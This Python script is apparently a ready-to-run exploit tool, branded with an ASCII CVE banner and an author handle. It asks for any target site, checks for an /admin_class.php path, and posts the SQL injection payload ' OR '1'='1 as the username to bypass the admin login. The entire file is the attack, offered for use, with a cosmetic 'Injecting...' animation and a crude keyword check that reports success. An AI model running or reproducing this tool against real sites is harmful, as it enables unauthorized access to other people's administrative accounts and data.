import requests
import time
import sys


laz_headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}

def check_path_exists(laz_url):
    try:
        response = requests.get(laz_url, headers=laz_headers)
        if response.status_code == 200:
            return True
        else:
            return False
    except requests.exceptions.RequestException as e:
        print(f"Error checking the path: {e}")
        return False

def inject_payload(laz_url, laz_payload):
    laz_data = {
        "username": laz_payload,
        "password": "any_password"
    }
    try:
        response = requests.post(laz_url, data=laz_data, headers=laz_headers)
        return response
    except requests.exceptions.RequestException as e:
        print(f"Error during injection: {e}")
        return None

def simulate_injection():
    animation = "|/-\\"
    for _ in range(20):
        sys.stdout.write(f"\rInjecting... {animation[_ % len(animation)]}")
        sys.stdout.flush()
        time.sleep(0.1)
    print("\rInjection complete.          ")

def check_injection_success(laz_response):
    # Cheking for comon signs of SQL Inje
    if any(keyword in laz_response.text for keyword in ["Welcome", "Dashboard", "admin", "logout"]):
        return True
    return False

def main():
    print("""
 ██████╗██╗   ██╗███████╗      ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██████╗  ██████╗ ██╗  ██╗██████╗ 
██╔════╝██║   ██║██╔════╝      ╚════██╗██╔═████╗╚════██╗██║  ██║      ██╔════╝ ██╔═████╗██║  ██║╚════██╗
██║     ██║   ██║█████╗  █████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗███████╗ ██║██╔██║███████║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝  ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══██╗████╔╝██║╚════██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗      ███████╗╚██████╔╝███████╗     ██║      ╚██████╔╝╚██████╔╝     ██║██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝      ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═════╝  ╚═════╝      ╚═╝╚═════╝ 
                                                                                                        
          BY @GhostByte discord.gg/byt
""")
    laz_target = input("Enter the target site (e.g., http://target-site.com): ").strip()
    laz_admin_path = laz_target + "/admin_class.php"

    print(f"Checking if {laz_admin_path} exists...")
    if check_path_exists(laz_admin_path):
        print("The path exists.")
        proceed = input("Do you want to inject the payload? (Y/N): ").strip().lower()
        if proceed == 'y':
            laz_payload = "' OR '1'='1"
            simulate_injection()
            laz_response = inject_payload(laz_admin_path, laz_payload)
            if laz_response and check_injection_success(laz_response):
                print("SQL Injection successful! Admin login bypassed.")
            else:
                print("SQL Injection failed. The target might be patched or not vulnerable.")
        else:
            print("Injection aborted by the user.")
    else:
        print(f"The path {laz_admin_path} does not exist. Exiting.")

if __name__ == "__main__":
    main()